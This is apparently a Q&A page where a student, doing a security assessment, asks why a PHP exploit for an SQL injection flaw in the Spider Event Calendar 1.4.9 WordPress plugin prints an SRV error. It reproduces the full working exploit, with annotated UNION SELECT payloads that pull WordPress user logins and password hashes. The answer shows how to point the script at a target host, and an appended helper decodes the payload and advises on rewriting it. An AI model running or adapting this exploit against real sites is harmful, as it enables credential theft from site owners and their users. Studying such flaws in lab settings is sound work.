
PHP problem - WordPress plugin Webdorado Spider Event Calendar 1.4.9 - SQL injection vulnerability

How to solve: PHP problem - WordPress plugin Webdorado Spider Event Calendar 1.4.9 - SQL injection vulnerability

As part of an assessment, we were asked to find a known flaw in a system and write code to exploit it. I chose the SQL injection flaw, but when I execute the code (written in PHP, which I have never used) I get the following error: "Please put server (without protocol) name in SRV GET variable!", and I can neither understand it nor solve it!

Exploit code: https://www.exploit-db.com/exploits/36061

'''

<?php

/*
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's a PHP application.
# CVE : CWE-89
# Owasp Top10: A1-Injection

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

// Both requests go to the same admin-ajax action and inject through the cat_id
// parameter: "1)" closes the parenthesis the plugin puts around the value, then a
// six-column UNION SELECT is appended and the rest of the original query is commented out.
// Positional placeholders: %1$s = target host, %2$s = the fake event ID (it is the first
// UNION column, so the injected row shows up as ev_ids=<fake ID> in the returned HTML),
// %3$s = the users table name found by the first request.
// The first request reads, from information_schema, the name of the first table matching
// '%users' (CHAR(37,117,115,101,114,115)) and wraps it in ### ... ## markers.
define('FETCH_PREFIX_URL', 'http://%1$s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%2$s&cat_id=1)%%20UNION%%20SELECT%%20%2$s,1,%%20FROM_UNIXTIME(1423004400),(SELECT%%20CONCAT(CHAR(35,35,35),table_name,CHAR(35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),%%20CHAR(110,%%20111,%%2095,%%20112,%%2097,%%20116),1%%20FROM%%20DUAL;--%%20--%%20&widget=0');

// The second request dumps user_login##user_pass pairs (rows separated by GROUP_CONCAT's
// default ',') between #!#!#!# markers. The head of this URL was cut off in the copy
// posted above and is rebuilt here from FETCH_PREFIX_URL; the marker SQL is written so
// that it produces exactly the separators defined below.
define('FETCH_USERS_URL', 'http://%1$s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%2$s&cat_id=1)%%20UNION%%20SELECT%%20%2$s,1,%%20FROM_UNIXTIME(1423004400),CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(CONCAT(user_login,CHAR(35,35),user_pass)),CHAR(35,33,35,33,35,33,35)),1,1%%20AS%%20fakeGroup%%20FROM%%20%3$s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');

define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids=' . FAKE_ID_TO_SEARCH); // proves the UNION row was rendered
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');                // wraps the user list
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');

// Fetch a URL and return the body as a string. CURLOPT_RETURNTRANSFER is required:
// without it curl_exec() prints the page and returns true instead of the HTML.
function fetch(string $url): string
{
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($curl);
    curl_close($curl);
    return $result === false ? '' : $result;
}

// The target is taken from the SRV query-string variable of the request to THIS script,
// e.g. http://localhost/exploit.php?SRV=target.example (host only, no http://).
$server = isset($_GET['SRV']) ? trim($_GET['SRV']) : '';
if ($server === '') {
    echo 'Please put server (without protocol) name in SRV GET variable!';
} else {
    $result = fetch(sprintf(FETCH_PREFIX_URL, $server, FAKE_ID_TO_SEARCH));
    if (stripos($result, PATTERN_TO_SEARCH) === false) {
        echo 'NOT vulnerable :-(';
    } elseif (!preg_match('/###([a-zA-Z_0-9]+)##/', $result, $tableNames)) {
        // The query wraps the name as ###<name>## (CHAR(35,35,35) / CHAR(35,35)),
        // so that is the pattern looked for here.
        echo 'Injection worked, but no table name ending in "users" came back :-(';
    } else {
        $tableName = $tableNames[1];
        echo 'tableName: ' . htmlspecialchars($tableName) . '<BR/>';

        $result = fetch(sprintf(FETCH_USERS_URL, $server, FAKE_ID_TO_SEARCH, $tableName));
        $markerLen = strlen(PATTERN_TO_SEARCH_USERS);
        $from = stripos($result, PATTERN_TO_SEARCH_USERS);
        $to = ($from === false) ? false : stripos($result, PATTERN_TO_SEARCH_USERS, $from + $markerLen);
        if ($from !== false && $to !== false) {
            // Text between the two markers: login##hash,login##hash,...
            $list = substr($result, $from + $markerLen, $to - $from - $markerLen);
            echo '<table>';
            foreach (explode(ROW_SEPARATOR, $list) as $row) {
                $cells = array_map('htmlspecialchars', explode(FIELD_SEPARATOR, $row));
                echo '<tr><td>' . implode('</td><td>', $cells) . '</td></tr>';
            }
            echo '</table>';
        } else {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
}

'''

Solution

You can do one of two things:

A. Modify the code of this file so that it points at the server you want to query:

Change:

$server = $_GET['SRV'];

to:

$server = 'theservertotest.com';

B. Pass the server in the query string of the URL from which you are running this PHP file:

https://mysqlinject-testsite.com/exploit_test.php?SRV=theservertotest.com
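Added example, not part of the exploit-db script or of the answer above. It covers two things the answer leaves implicit. First, `$_GET` is empty when the file is run as `php exploit.php` from a shell rather than through a web server, which is the most common way to hit exactly the error in the question; `target_host()` therefore takes the host from `argv[1]` under the CLI and from `?SRV=` otherwise. Second, before rewriting the payload (the script's own "try to rewrite exploit" message), you want to read the SQL the server will actually receive: `injected_cat_id()` URL-decodes the `cat_id` parameter, `decode_char_calls()` turns the `CHAR(...)` obfuscation back into string literals, and `union_column_count()` counts the columns of the injected `UNION SELECT`, which must equal the column count of the plugin's own query or MySQL rejects the statement. `FETCH_PREFIX_URL` is the exploit's format string written with positional placeholders (`%1$s` host, `%2$s` fake event ID); the helper functions, the file name `inspect_payload.php` and the host `target.example` are ours, and the column counter assumes MySQL-style parentheses.

```php
<?php
// Added example: run the exploit's first request format from the command line and
// show the decoded injection. Not the exploit author's code.

// The exploit's FETCH_PREFIX_URL with positional placeholders: %1$s host, %2$s fake event ID.
define('FETCH_PREFIX_URL', 'http://%1$s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%2$s&cat_id=1)%%20UNION%%20SELECT%%20%2$s,1,%%20FROM_UNIXTIME(1423004400),(SELECT%%20CONCAT(CHAR(35,35,35),table_name,CHAR(35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),%%20CHAR(110,%%20111,%%2095,%%20112,%%2097,%%20116),1%%20FROM%%20DUAL;--%%20--%%20&widget=0');

// Target host: argv[1] when run with `php inspect_payload.php <host>`, $_GET['SRV'] when served.
function target_host(array $argv): string
{
    if (PHP_SAPI === 'cli') {
        return isset($argv[1]) ? trim($argv[1]) : '';
    }
    return isset($_GET['SRV']) ? trim($_GET['SRV']) : '';
}

// The cat_id value exactly as the server sees it after URL decoding.
function injected_cat_id(string $url): string
{
    parse_str((string) parse_url($url, PHP_URL_QUERY), $params); // parse_str urldecodes values
    return isset($params['cat_id']) ? (string) $params['cat_id'] : '';
}

// Replace CHAR(37, 117, ...) calls with the quoted string they evaluate to.
function decode_char_calls(string $sql): string
{
    return preg_replace_callback('/CHAR\(\s*([\d\s,]+)\)/i', function (array $m): string {
        $text = '';
        foreach (explode(',', $m[1]) as $code) {
            $text .= chr((int) trim($code));
        }
        return "'" . $text . "'";
    }, $sql);
}

// Count top-level columns between "UNION SELECT" and the outer "FROM",
// ignoring commas inside parentheses (sub-selects, CHAR(...), CONCAT(...)).
function union_column_count(string $sql): int
{
    $pos = stripos($sql, 'UNION SELECT');
    if ($pos === false) {
        return 0;
    }
    $body = substr($sql, $pos + strlen('UNION SELECT'));
    $depth = 0;
    $columns = 1;
    for ($i = 0, $len = strlen($body); $i < $len; $i++) {
        $ch = $body[$i];
        if ($ch === '(') {
            $depth++;
        } elseif ($ch === ')') {
            $depth--;
        } elseif ($depth === 0) {
            if ($ch === ',') {
                $columns++;
            } elseif (strncasecmp(substr($body, $i), ' FROM ', 6) === 0) {
                break; // end of the outer select list
            }
        }
    }
    return $columns;
}

$host = target_host(isset($argv) ? $argv : []);
if ($host === '') {
    echo "Usage: php inspect_payload.php <host>   (or ?SRV=<host> when served over HTTP)\n";
    exit(1);
}
$url = sprintf(FETCH_PREFIX_URL, $host, 12345677654321);
$sql = injected_cat_id($url);
echo "Request URL:\n", $url, "\n\n";
echo "cat_id as the database sees it:\n", decode_char_calls($sql), "\n\n";
echo 'Columns in the injected UNION SELECT: ', union_column_count($sql), "\n";
```

Run it as `php inspect_payload.php target.example` and compare the printed column count with the number of columns the plugin selects in its own query; if they differ, the UNION is what has to be rewritten, not the marker handling. Nothing here sends a request, so it is safe to run against any hostname.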
